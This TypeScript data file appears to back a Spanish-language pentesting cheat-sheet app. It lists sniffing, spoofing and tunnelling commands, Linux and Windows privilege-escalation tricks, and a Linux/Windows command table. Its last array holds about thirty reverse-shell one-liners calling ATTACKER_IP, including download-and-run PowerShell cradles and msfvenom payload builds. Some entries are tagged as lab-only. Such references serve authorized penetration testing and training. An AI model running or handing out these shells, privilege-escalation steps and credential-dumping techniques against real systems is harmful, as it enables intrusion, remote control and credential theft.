      { cmd: 'tcpdump -i eth0 -nn "tcp[tcpflags] & (tcp-syn|tcp-fin) != 0"', desc: 'Solo SYN/FIN (escaneos y cierres)' },
      { cmd: 'tshark -i eth0 -Y "http.request" -T fields -e http.host -e http.request.uri', desc: 'URLs HTTP en vivo' },
      { cmd: 'tshark -r captura.pcap -Y "dns" -T fields -e dns.qry.name | sort -u', desc: 'Dominios consultados en un pcap' },
      { cmd: 'tshark -r captura.pcap -q -z conv,tcp', desc: 'Top conversaciones TCP' },
      { cmd: 'tcpick -i eth0 -yP  # o tcpflow -i eth0', desc: 'Reconstruir streams TCP en vivo' },
      { cmd: 'ettercap -T -M arp:remote /10.0.0.1// /10.0.0.50//  # ¡solo lab!', desc: 'MITM por ARP spoofing (entorno controlado)' },
      { cmd: 'macof -i eth0 -n 1000  # (lab: saturar tabla CAM)', desc: 'MAC flooding (demo educativa)' },
      { cmd: 'arp-scan --localnet', desc: 'Descubrir hosts por ARP (rápido y fiable)' },
      { cmd: 'nmap -sn 192.168.1.0/24 && nmap -sT -p- -T4 --min-rate 5000 10.10.10.5', desc: 'Descubrir y escanear los 65535 puertos' },
    ],
  },
  {
    name: 'Servidores rápido (lab)',
    items: [
      { cmd: 'python3 -m http.server 8000 --bind 0.0.0.0', desc: 'Servidor de ficheros HTTP' },
      { cmd: 'php -S 0.0.0.0:8080 -t ./public', desc: 'Servidor PHP para pruebas' },
      { cmd: 'nc -lvnp 4444', desc: 'Listener netcat genérico' },
      { cmd: 'socat TCP-LISTEN:8080,fork,reuseaddr TCP:10.0.0.5:80', desc: 'Proxy/reenvío de puerto' },
      { cmd: 'ssh -N -L 0.0.0.0:8080:10.0.0.5:80 user@puente', desc: 'Túnel expuesto a terceros' },
      { cmd: 'responder -I eth0 -dwPv  # ¡entorno autorizado!', desc: 'Envenenar LLMNR/NBT-NS/mDNS' },
      { cmd: 'dnsspoof -i eth0 host ejemplo.com', desc: 'Spoof de DNS (lab)' },
      { cmd: 'impacket-smbserver share . -smb2support', desc: 'Compartición SMB temporal' },
    ],
  },
  {
    name: 'IPv6 rápido',
    items: [
      { cmd: 'ip -6 a && ip -6 r', desc: 'Direcciones y rutas IPv6' },
      { cmd: 'ping6 -c 3 ff02::1%eth0', desc: 'Ping a todos los nodos (multicast)' },
      { cmd: 'traceroute6 dominio.com  # o mtr -6', desc: 'Ruta IPv6' },
      { cmd: 'nmap -6 -sV -p 22,80,443 host.ipv6', desc: 'Escanear sobre IPv6' },
      { cmd: 'radvd/prefix delegation: cat /proc/net/if_inet6', desc: 'Prefijos anunciados y asignados' },
      { cmd: 'thc-ipv6: parasite6 -i eth0  # (lab)', desc: 'RA spoofing (educativo)' },
    ],
  },
  {
    name: 'Pivoting y túneles',
    items: [
      { cmd: 'ssh -L 5432:db.interno:5432 user@puente', desc: 'Túnel local a un puerto interno (db)' },
      { cmd: 'ssh -R 8888:localhost:80 user@atacante', desc: 'Túnel inverso: exponer tu 80 en el atacante' },
      { cmd: 'ssh -D 1080 user@host  # + proxychains4', desc: 'SOCKS dinámico para todas las tools' },
      { cmd: 'sshuttle --dns -r user@host 10.0.0.0/8', desc: 'VPN por SSH que enruta subredes enteras' },
      { cmd: 'chisel server -p 80 --reverse  # client: chisel client http://IP:80 R:socks', desc: 'SOCKS sobre HTTP (salta proxies corporativos)' },
      { cmd: 'socat TCP-LISTEN:4443,fork,reuseaddr SSL:destino:4443', desc: 'Puente TCP→TLS transparente' },
      { cmd: 'plink -ssh -L 8080:10.0.0.5:80 user@host  # (Windows)', desc: 'Túnel SSH desde Windows sin OpenSSH' },
      { cmd: 'proxychains4 -q nmap -sT -Pn --top-ports 100 host', desc: 'Escanear a través de SOCKS' },
      { cmd: 'ligolo-ng: proxy -selfcert  # agent en el target', desc: 'Túnel TUN cómodo para doble pivote' },
      { cmd: 'ssh -W %h:%p bastion  # ProxyJump en ~/.ssh/config', desc: 'Configurar saltos permanentes' },
    ],
  },
  {
    name: 'DNS avanzado',
    items: [
      { cmd: 'dig +short TXT dominio.com @ns1', desc: 'TXT: SPF, verificación, DKIM selector pba' },
      { cmd: 'dig @ns1.dominio.com dominio.com AXFR', desc: 'Transferencia de zona (si responde, clásico)' },
      { cmd: 'nslookup -type=ns dominio.com', desc: 'Nameservers delegados' },
      { cmd: 'dnsrecon -d dominio.com -t std,brute -f', desc: 'Enum DNS completa con bruteforce' },
      { cmd: 'dnsenum dominio.com --enum', desc: 'Enum + reverse sobre el rango de la IP' },
      { cmd: 'dig _dmarc.dominio.com TXT +short', desc: 'Política DMARC del dominio' },
      { cmd: 'host -a dominio.com 8.8.8.8', desc: 'Cualquier registro desde resolver externo' },
      { cmd: 'dnscat2  # servidor en atacante, client en target (lab)', desc: 'Túnel DNS completo' },
      { cmd: 'resolvectl query dominio.com', desc: 'Consulta con el resolver del sistema' },
      { cmd: 'curl -s "https://dns.google/resolve?name=dominio.com&type=A"', desc: 'DoH desde curl (sin cliente DNS)' },
    ],
  },
]

export const PRIVESC_HINTS: { platform: 'linux' | 'windows'; text: string }[] = [
  // ─── Linux ───
  { platform: 'linux', text: 'sudo -l: buscar binarios en GTFOBins (https://gtfobins.github.io) — vi, find, tar, less, awk, env y python son los clásicos' },
  { platform: 'linux', text: 'sudo NOPASSWD con wildcard: /bin/chown * /home/* → secuestra ficheros arbitrarios' },
  { platform: 'linux', text: 'sudo LD_PRELOAD si env_keep incluye LD_* → compilar .so con _init() que hace setuid(0)' },
  { platform: 'linux', text: 'sudo sin TTY: sudo -l en PTY propio (python -c "import pty;pty.spawn(\'/bin/bash\")")' },
  { platform: 'linux', text: 'SUID/SGID raros → gtfobins; getcap -r / 2>/dev/null → capabilities (cap_setuid+ep en python = root)' },
  { platform: 'linux', text: 'find / -writable -type d → ¿algo en PATH de un servicio root? Secuestro por PATH' },
  { platform: 'linux', text: 'Cron writable o scripts relativos sin path absoluto → secuestro por PATH (echo bash > /usr/local/bin/nombre)' },
  { platform: 'linux', text: 'Cron que ejecuta .sh con wildcard: touch -- "--checkpoint=1" y --checkpoint-action=exec=… (tar wildcards)' },
  { platform: 'linux', text: '/etc/passwd escribible (rw-r--r--) → añadir usuario root con hash openssl passwd -1' },
  { platform: 'linux', text: '/etc/shadow legible → john --wordlist=rockyou.txt shadow' },
  { platform: 'linux', text: 'systemd timers/servicios con ExecStart modificable → systemd unit hijacking (daemon-reload + restart)' },
  { platform: 'linux', text: 'NFS no_root_squash en /etc/exports → montar con -o noresvport y ejecutar SUID root' },
  { platform: 'linux', text: 'Docker group → docker run -v /:/host --rm -it alpine chroot /host sh' },
  { platform: 'linux', text: 'LXD/LXC group → crear contenedor privilegiado montando / (lxc init + lxc config device add)' },
  { platform: 'linux', text: 'Sudo versión < 1.8.28 → CVE-2019-14287 (sudo -u#-1)' },
  { platform: 'linux', text: 'Sudo 1.8.14-1.8.20 → CVE-2017-1000367 (wheel injection por env)' },
  { platform: 'linux', text: 'Kernel viejo + /lib/modules accesible → DirtyCow/CVE-2016-5195, DirtyPipe/CVE-2022-0847' },
  { platform: 'linux', text: 'pkexec (polkit) sin parche → CVE-2021-4034 PwnKit (casi todos los sistemas hasta 2022)' },
  { platform: 'linux', text: 'MOTD o /etc/update-motd.d/ escribible → ejecuta como root en cada login' },
  { platform: 'linux', text: '/etc/ld.so.preload escribible → preload .so malicioso global' },
  { platform: 'linux', text: 'python .pth en site-packages escribible → código Python al inicio del intérprete (root si pip corre como root)' },
  { platform: 'linux', text: 'Git repo con hook escribible (post-merge) → ejecuta al hacer pull (si el dueño es root)' },
  { platform: 'linux', text: 'Apt/Dpkg hooks en /etc/apt/apt.conf.d/ escribibles → código como root en apt install' },
  { platform: 'linux', text: 'Bus dbus sistema con servicio mal configurado → linPEAS lo detecta (dbus privesc)' },
  { platform: 'linux', text: 'Autologin /etc/systemd/system/getty@tty1.service.d/override.conf → password en claro' },
  { platform: 'linux', text: 'Credenciales en ficheros de config: grep -rE "(pass|pwd|secret)" /etc /opt /home 2>/dev/null' },
  { platform: 'linux', text: 'Bash history del root: cat /root/.bash_history (comandos con passwords en línea)' },
  { platform: 'linux', text: 'PAM: /etc/pam.d/common-auth escribible → pam_exec.so para robar credenciales' },
  { platform: 'linux', text: 'Cap_SETUID en binario python: /usr/bin/python3 con cap_setuid+ep → import os;os.setuid(0)' },
  { platform: 'linux', text: 'LD_LIBRARY_PATH de un SUID con ldd ./bin → secuestrar librería (ldd revela rutas de carga)' },
  { platform: 'linux', text: 'passwd -S usuario | ver si usa DES/MD5 → hashes antiguos crackean al instante' },
  { platform: 'linux', text: 'Sudo < 1.9.13p3 → CVE-2023-22809 (bypass de restricciones en sudoedit)' },
  { platform: 'linux', text: 'getfacl en binarios SUID con ACL extraña → permisos heredados raros = vector' },
  { platform: 'linux', text: 'grep -rE "^User=|^ExecStart=" /etc/systemd/system → servicios root con binario escribible' },
  { platform: 'linux', text: 'process accounting (accton/pacct) activo → histórico de ejecutables del sistema' },
  { platform: 'linux', text: '/etc/environment escribible → LD_PRELOAD global (carga una .so en cada login)' },
  { platform: 'linux', text: 'Sesión X sin auth (xhost +) → xdotool inyecta teclas en la sesión del otro usuario' },
  { platform: 'linux', text: 'Automatiza: linpeas.sh, linux-exploit-suggester-2, pspy (ver cron sin ser root)' },
  // ─── Windows ───
  { platform: 'windows', text: 'whoami /priv: SeImpersonate → JuicyPotato/Potato family (PrintSpoofer, GodPotato en 2019+)' },
  { platform: 'windows', text: 'SeBackupPrivilege → copiar NTDS.dit con diskshadow + robocopy /b' },
  { platform: 'windows', text: 'SeRestorePrivilege → sobreescribir binarios del sistema (utilman.exe → cmd)' },
  { platform: 'windows', text: 'SeTakeOwnershipPrivilege → tomar ownership de ficheros del sistema' },
  { platform: 'windows', text: 'SeDebugPrivilege → dump LSASS con procdump o comsvcs.dll MiniDump' },
  { platform: 'windows', text: 'Servicios con binPath no entrecomicado → Unquoted Service Path (crear .exe en la ruta corta)' },
  { platform: 'windows', text: 'Servicio con binario modificable (icacls) → reemplazarlo y reiniciar (sc stop/start)' },
  { platform: 'windows', text: 'AlwaysInstallElevated=1 → msiexec /i payload.msi /qn como SYSTEM' },
  { platform: 'windows', text: 'Autologon y credenciales en registro (Winlogon) y archivos de configuración' },
  { platform: 'windows', text: 'cmdkey /list con credenciales guardadas → runas /savecred para ejecutar como ese usuario' },
  { platform: 'windows', text: 'Registry autoRun keys → persistencia + privesc si el binario es modificable' },
  { platform: 'windows', text: 'Scheduled tasks con binario modificable → reemplazar y esperar ejecución' },
  { platform: 'windows', text: 'DLL Hijacking: Process Monitor find "NAME NOT FOUND" en Path de servicio SYSTEM' },
  { platform: 'windows', text: 'Web shell / web.config con identidad impersonada → leer credenciales de connectionStrings' },
  { platform: 'windows', text: 'GPP (groups.xml) con cpassword → descifrar con gpp-decrypt (MS14-025)' },
  { platform: 'windows', text: 'Kerberoasting: GetUserSPNs + hashcat -m 13100 → password de service accounts' },
  { platform: 'windows', text: 'AS-REP Roasting: GetNPUsers + hashcat -m 18200 → usuarios sin pre-auth' },
  { platform: 'windows', text: 'PrintNightmare (CVE-2021-34527) → RCE como SYSTEM si spooler activo' },
  { platform: 'windows', text: 'PetitPotam/DFSCoerce → NTLM relay a ADCS para obtener cert de DC' },
  { platform: 'windows', text: 'Zerologon (CVE-2020-1472) → resetear contraseña de DC (¡rompe el dominio! lab only)' },
  { platform: 'windows', text: 'Unattend.xml con credenciales en C:\\\\Windows\\\\System32\\\\Sysprep\\\\ → password admin en claro/base64' },
  { platform: 'windows', text: 'WSUS sin SSL → injecting de actualizaciones maliciosas (miTM local)' },
  { platform: 'windows', text: 'Windows Server 2008/2012 → eternaBlue-likes: MS17-010, MS08-067' },
  { platform: 'windows', text: 'LAPS sin desplegar (Get-AdComputer ms-Mcs-AdmPwd vacío) → contraseñas locales duplicadas' },
  { platform: 'windows', text: 'Servicios con usuario de dominio y password en unattend.xml/GPP → credencial de servicio reutilizada' },
  { platform: 'windows', text: 'Web shell en IIS (appcmd.exe list vdir) → rutas de apps y app pools con identidad elevada' },
  { platform: 'windows', text: 'DLL hijacking en apps que arranque un admin (ProcMon filtrando NAME NOT FOUND en carpeta escribible)' },
  { platform: 'windows', text: 'JEA (Just Enough Administration) mal configurado → session configuration con permisos excesivos' },
  { platform: 'windows', text: 'LAPS instalado pero con ACL rota → cualquier usuario puede leer ms-Mcs-AdmPwd' },
  { platform: 'windows', text: 'ADCS mal configurado: ESC1-ESC8 → pedir certificado de DC (Certipy los detecta)' },
  { platform: 'windows', text: 'GPO Startup Script editable → script como SYSTEM en cada boot de la máquina' },
  { platform: 'windows', text: 'SeDebugPrivilege + Procdump a winlogon → credenciales del usuario interactivo' },
  { platform: 'windows', text: 'Automatiza: winPEAS.exe, PowerUp.ps1 (Invoke-AllChecks), Seatbelt.exe, Sherlock' },
]

export const EQUIV_CMD: { linux: string; win: string; desc: string }[] = [
  { linux: 'ip a', win: 'ipconfig /all', desc: 'Ver interfaces de red' },
  { linux: 'ip -br a', win: 'Get-NetIPAddress | ft', desc: 'IPs resumidas' },
  { linux: 'ss -tulpn', win: 'netstat -abno', desc: 'Puertos abiertos' },
  { linux: 'ss -tan state established', win: 'netstat -ano | findstr ESTABLISHED', desc: 'Conexiones establecidas' },
  { linux: 'ip neigh', win: 'arp -a', desc: 'Tabla ARP' },
  { linux: 'dig dominio.com', win: 'nslookup dominio.com', desc: 'Resolver DNS' },
  { linux: 'ping -c 4 host', win: 'ping -n 4 host', desc: 'Probar conectividad' },
  { linux: 'traceroute host', win: 'tracert host', desc: 'Ruta hasta un host' },
  { linux: 'mtr host', win: 'pathping host', desc: 'Ruta con estadísticas' },
  { linux: 'curl -I https://host', win: 'Invoke-WebRequest -Method Head https://host', desc: 'Cabeceras HTTP' },
  { linux: 'curl -O http://IP/f', win: 'certutil -urlcache -f http://IP/f f', desc: 'Descargar fichero' },
  { linux: 'wget http://IP/f -O f', win: 'bitsadmin /transfer j http://IP/f C:\\\\f', desc: 'Descarga con reanudación' },
  { linux: 'cat /etc/passwd', win: 'Get-LocalUser', desc: 'Usuarios del sistema' },
  { linux: 'ps aux', win: 'Get-Process', desc: 'Procesos' },
  { linux: 'ps auxf', win: 'wmic process get ProcessId,ParentProcessId,CommandLine', desc: 'Procesos con padre y cmdline' },
  { linux: 'kill -9 PID', win: 'taskkill /F /PID PID', desc: 'Matar proceso' },
  { linux: 'systemctl status ssh', win: 'Get-Service sshd', desc: 'Estado de un servicio' },
  { linux: 'systemctl restart ssh', win: 'Restart-Service sshd', desc: 'Reiniciar servicio' },
  { linux: 'systemctl list-timers', win: 'Get-ScheduledTask', desc: 'Tareas programadas' },
  { linux: 'crontab -l', win: 'schtasks /query /fo LIST /v', desc: 'Tareas programadas (verbose)' },
  { linux: 'tar czf out.tgz dir/', win: 'Compress-Archive -Path dir -Dest out.zip', desc: 'Comprimir' },
  { linux: 'tar xzf out.tgz', win: 'Expand-Archive out.zip -Dest .', desc: 'Descomprimir' },
  { linux: 'stat fichero', win: 'Get-ItemProperty fichero | fl *', desc: 'Metadatos de fichero' },
  { linux: 'df -h', win: 'Get-PSDrive -PSProvider FileSystem', desc: 'Espacio en disco' },
  { linux: 'free -h', win: 'Get-CimInstance Win32_OperatingSystem | Select TotalVisibleMemorySize,FreePhysicalMemory', desc: 'Memoria' },
  { linux: 'lsof fichero', win: 'openfiles /query', desc: 'Ficheros abiertos' },
  { linux: 'sha256sum fichero', win: 'Get-FileHash fichero -Algorithm SHA256', desc: 'Hash de integridad' },
  { linux: 'md5sum fichero', win: 'certutil -hashfile fichero MD5', desc: 'Hash MD5' },
  { linux: 'id', win: 'whoami /groups', desc: 'Identidad y grupos' },
  { linux: 'id -u', win: 'whoami /user', desc: 'UID/SID actual' },
  { linux: 'sudo -l', win: 'whoami /priv', desc: 'Qué privilegios tengo' },
  { linux: 'su - admin', win: 'runas /user:admin cmd', desc: 'Cambiar de usuario' },
  { linux: 'uname -a', win: 'systeminfo | findstr /B /C:"OS"', desc: 'Versión del sistema' },
  { linux: 'lsb_release -a', win: 'winver', desc: 'Versión gráfica' },
  { linux: 'hostname', win: 'hostname', desc: 'Nombre del equipo' },
  { linux: 'hostnamectl set-hostname nuevo', win: 'Rename-Computer -NewName nuevo', desc: 'Cambiar hostname' },
  { linux: 'env', win: 'Get-ChildItem Env:', desc: 'Variables de entorno' },
  { linux: 'echo $PATH', win: '$env:PATH', desc: 'PATH' },
  { linux: 'history', win: 'Get-History', desc: 'Historial de comandos' },
  { linux: 'head -f fichero (tail -f)', win: 'Get-Content fichero -Tail 10 -Wait', desc: 'Seguir fichero en vivo' },
  { linux: 'grep -i patrón fichero', win: 'Select-String -Path fichero -Pattern patrón', desc: 'Buscar en fichero' },
  { linux: 'sed s/a/b/g fichero', win: '(Get-Content f) -replace "a","b" | Set-Content f', desc: 'Reemplazar en fichero' },
  { linux: 'chown user:grupo fichero', win: 'icacls fichero /setowner user', desc: 'Cambiar propietario' },
  { linux: 'chmod 700 fichero', win: 'icacls fichero /inheritance:r /grant:r user:F', desc: 'Permisos restrictivos' },
  { linux: 'ls -la', win: 'Get-ChildItem -Force', desc: 'Listado con ocultos' },
  { linux: 'mount', win: 'Get-Volume / net use', desc: 'Unidades montadas' },
  { linux: 'mount -t cifs //srv/share /mnt', win: 'net use Z: \\\\srv\\\\share pass /user:user', desc: 'Montar share SMB' },
  { linux: 'du -sh *', win: 'Get-ChildItem | ForEach-Object { "{0:N2} MB - {1}" -f ((Get-ChildItem $_ -Recurse | Measure-Object Length -Sum).Sum/1MB), $_ }', desc: 'Tamaño de carpetas' },
  { linux: 'dd if=/dev/sda of=img.img', win: 'wbadmin start backup -backupTarget:E: -include:C:', desc: 'Imagen de disco' },
  { linux: 'journalctl -f', win: 'Get-WinEvent -LogName System -MaxEvents 10 -Oldest', desc: 'Logs del sistema' },
  { linux: 'dmesg', win: 'Get-WinEvent -LogName System | ? ProviderName -match "Kernel"', desc: 'Mensajes de kernel' },
  { linux: 'iptables -L -n', win: 'netsh advfirewall show allprofiles state', desc: 'Ver firewall' },
  { linux: 'ufw allow 22/tcp', win: 'New-NetFirewallRule -DisplayName SSH -Direction Inbound -Port 22 -Protocol TCP -Action Allow', desc: 'Abrir puerto en firewall' },
  { linux: 'sshd config /etc/ssh/sshd_config', win: 'C:\\\\ProgramData\\\\ssh\\\\sshd_config', desc: 'Configuración de SSH' },
  { linux: 'ssh user@host', win: 'ssh user@host (Win10+ trae OpenSSH)', desc: 'SSH (igual en ambos)' },
  { linux: 'scp -i clave f user@host:', win: 'scp -i clave f user@host:', desc: 'Copia SSH' },
  { linux: 'rsync -avzP dir/ host:dir/', win: 'robocopy dir \\\\host\\\\dir /MIR /Z', desc: 'Sincronizar directorios' },
  { linux: 'python3 -m http.server', win: 'python -m http.server (si hay python)', desc: 'Servidor web rápido' },
  { linux: 'openssl rand -base64 32', win: '[Convert]::ToBase64String((1..32 | Get-Random -Count 32 | % {[byte]$_}))', desc: 'Random base64' },
  { linux: 'date && date +%s', win: 'Get-Date -Format o && [DateTimeOffset]::Now.ToUnixTimeSeconds()', desc: 'Fecha y timestamp' },
  { linux: 'sleep 5', win: 'Start-Sleep 5', desc: 'Pausa' },
  { linux: 'watch -n1 cmd', win: 'while ($true) { Clear-Host; cmd; Start-Sleep 1 }', desc: 'Repetir comando' },
  { linux: 'which comando', win: 'Get-Command comando', desc: 'Localizar binario' },
  { linux: 'useradd -m usuario', win: 'New-LocalUser -Name usuario -NoPassword', desc: 'Crear usuario' },
  { linux: 'usermod -aG sudo usuario', win: 'Add-LocalGroupMember -Group Administradores -Member usuario', desc: 'Añadir a admins' },
  { linux: 'passwd usuario', win: 'Set-LocalUser -Name usuario -Password (ConvertTo-SecureString "p" -AsPlainText -Force)', desc: 'Cambiar contraseña' },
  { linux: 'nmap -sn 192.168.1.0/24', win: 'for ($i=1;$i -lt 255;$i++) { Test-Connection -Count 1 -Quiet 192.168.1.$i }', desc: 'Descubrir hosts vivos' },
  { linux: 'dig +short myip.opendns.com @resolver1.opendns.com', win: '(Invoke-RestMethod ifconfig.me)', desc: 'Mi IP pública' },
  { linux: 'umask 027', win: 'no existe: usar ACLs por defecto del share o icacls al crear', desc: 'Permisos por defecto de ficheros nuevos' },
  { linux: 'setfacl -m u:dev:rx f.txt', win: 'icacls f.txt /grant dev:(RX)', desc: 'Dar acceso puntual con ACL' },
  { linux: 'crontab -e', win: 'schtasks /create /tn t /tr cmd /sc daily /st 03:00', desc: 'Editar tareas programadas' },
  { linux: 'du -sh carpeta', win: '"{0:N2} GB" -f ((gci carpeta -Recurse | measure Length -Sum).Sum/1GB)', desc: 'Tamaño de una carpeta' },
  { linux: 'systemctl enable --now ssh', win: 'Set-Service sshd -StartupType Automatic; Start-Service sshd', desc: 'Habilitar y arrancar servicio' },
  { linux: 'usermod -L usuario', win: 'Disable-LocalUser -Name usuario', desc: 'Desactivar cuenta' },
  { linux: 'last -a | head', win: 'Get-WinEvent -FilterHashtable @{LogName="Security";Id=4624} -MaxEvents 10', desc: 'Últimos logins' },
  { linux: 'w', win: 'quser  # o: query user', desc: 'Sesiones interactivas activas' },
  { linux: 'readlink -f $(which python)', win: '(Get-Command python).Source', desc: 'Ruta real de un binario' },
  { linux: 'date -d @1700000000', win: '[DateTimeOffset]::FromUnixTimeSeconds(1700000000).LocalDateTime', desc: 'Timestamp → fecha legible' },
  { linux: 'xargs -I{} cmd {} < lista', win: 'foreach ($l in Get-Content lista) { cmd $l }', desc: 'Loop sobre lista de targets' },
  { linux: 'ln -s objetivo enlace', win: 'New-Item -ItemType SymbolicLink -Path enlace -Target objetivo', desc: 'Crear symlink' },
  { linux: 'lsof -i :443', win: 'Get-NetTCPConnection -LocalPort 443 | Select OwningProcess', desc: 'Quién usa un puerto' },
  { linux: 'openssl rand -hex 16', win: '-join((1..16|%{[byte](Get-Random -Max 256)})|%{$_.ToString("x2")})', desc: 'Random hex seguro (pseudo)' },
]

export const REV_SHELL_ONE_LINERS: { name: string; cmd: string }[] = [
  { name: 'Bash TCP', cmd: 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' },
  { name: 'Bash UDP', cmd: 'bash -i >& /dev/udp/ATTACKER_IP/4444 0>&1' },
  { name: 'Python (PTY)', cmd: 'python3 -c \'import pty,os,socket;s=socket.socket();s.connect(("ATTACKER_IP",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")\'' },
  { name: 'Python corto', cmd: 'python3 -c "import os,pty,socket;s=socket.socket();s.connect((\'ATTACKER_IP\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\'/bin/sh\')"' },
  { name: 'Perl', cmd: 'perl -e \'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' },
  { name: 'PHP', cmd: 'php -r \'$s=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");\'' },
  { name: 'Ruby', cmd: 'ruby -rsocket -e \'f=TCPSocket.open("ATTACKER_IP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\'' },
  { name: 'Netcat (con -e)', cmd: 'nc -e /bin/bash ATTACKER_IP 4444' },
  { name: 'Netcat (sin -e)', cmd: 'mkfifo /tmp/f; nc ATTACKER_IP 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f' },
  { name: 'Netcat (BusyBox)', cmd: 'busybox nc ATTACKER_IP 4444 -e /bin/sh' },
  { name: 'PowerShell', cmd: 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\'ATTACKER_IP\',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"' },
  { name: 'Powershell #2 (nishang)', cmd: 'powershell iex (New-Object Net.WebClient).DownloadString(\'http://ATTACKER_IP/Invoke-PowerShellTcp.ps1\')' },
  { name: 'Windows cmd', cmd: 'cmd.exe /c powershell -nop -w hidden -e <base64_payload>' },
  { name: 'Java', cmd: 'r = Runtime.getRuntime(); p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/4444;cat <&5 | while read line; do \\$line 2>&5 >&5; done"});' },
  { name: 'Golang', cmd: 'echo \'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","ATTACKER_IP:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go' },
  { name: 'Awk', cmd: 'awk \'BEGIN{s="/inet/tcp/0/ATTACKER_IP/4444";for(;s|&getline c;close(c))while(c|&getline)print $0|&s;close(s)}\'' },
  { name: 'Node.js', cmd: 'require("child_process").exec("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1")' },
  { name: 'Telnet (mkfifo)', cmd: 'mkfifo /tmp/f; telnet ATTACKER_IP 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f' },
  { name: 'Lua', cmd: 'lua -e "require(\'socket\');require(\'os\');t=io.popen(\'/bin/sh -i\');l=os.execute(\'nc ATTACKER_IP 4444 <&1 >&2\');"' },
  { name: 'msfvenom Linux ELF', cmd: 'msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o rev.elf' },
  { name: 'msfvenom Windows EXE', cmd: 'msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o rev.exe' },
  { name: 'msfvenom ASPX', cmd: 'msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f aspx -o rev.aspx' },
  { name: 'msfvenom WAR', cmd: 'msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f war -o rev.war' },
  { name: 'msfvenom PowerShell', cmd: 'msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f psh -o rev.ps1' },
  { name: 'TTY upgrade completo', cmd: 'python3 -c "import pty;pty.spawn(\'/bin/bash\')"  +  Ctrl+Z  +  stty raw -echo; fg  +  export TERM=xterm' },
  { name: 'nc.exe (Windows)', cmd: 'nc.exe ATTACKER_IP 4444 -e cmd.exe' },
  { name: 'PowerShell web', cmd: 'powershell -nop -w hidden -c "iex(New-Object Net.WebClient).DownloadString(\'http://ATTACKER_IP/rev.ps1\')"' },
  { name: 'Bash sobre TLS (openssl)', cmd: 'openssl s_client -quiet -connect ATTACKER_IP:4444 | /bin/bash 2>&1 | openssl s_client -quiet -connect ATTACKER_IP:4445' },
  { name: 'Xterm', cmd: 'xterm -display ATTACKER_IP:1 &  # + Xnest :1 -ac en el atacante' },
  { name: 'SSH túnel inverso', cmd: 'ssh -R 4444:localhost:22 ATTACKER_USER@ATTACKER_IP' },
]
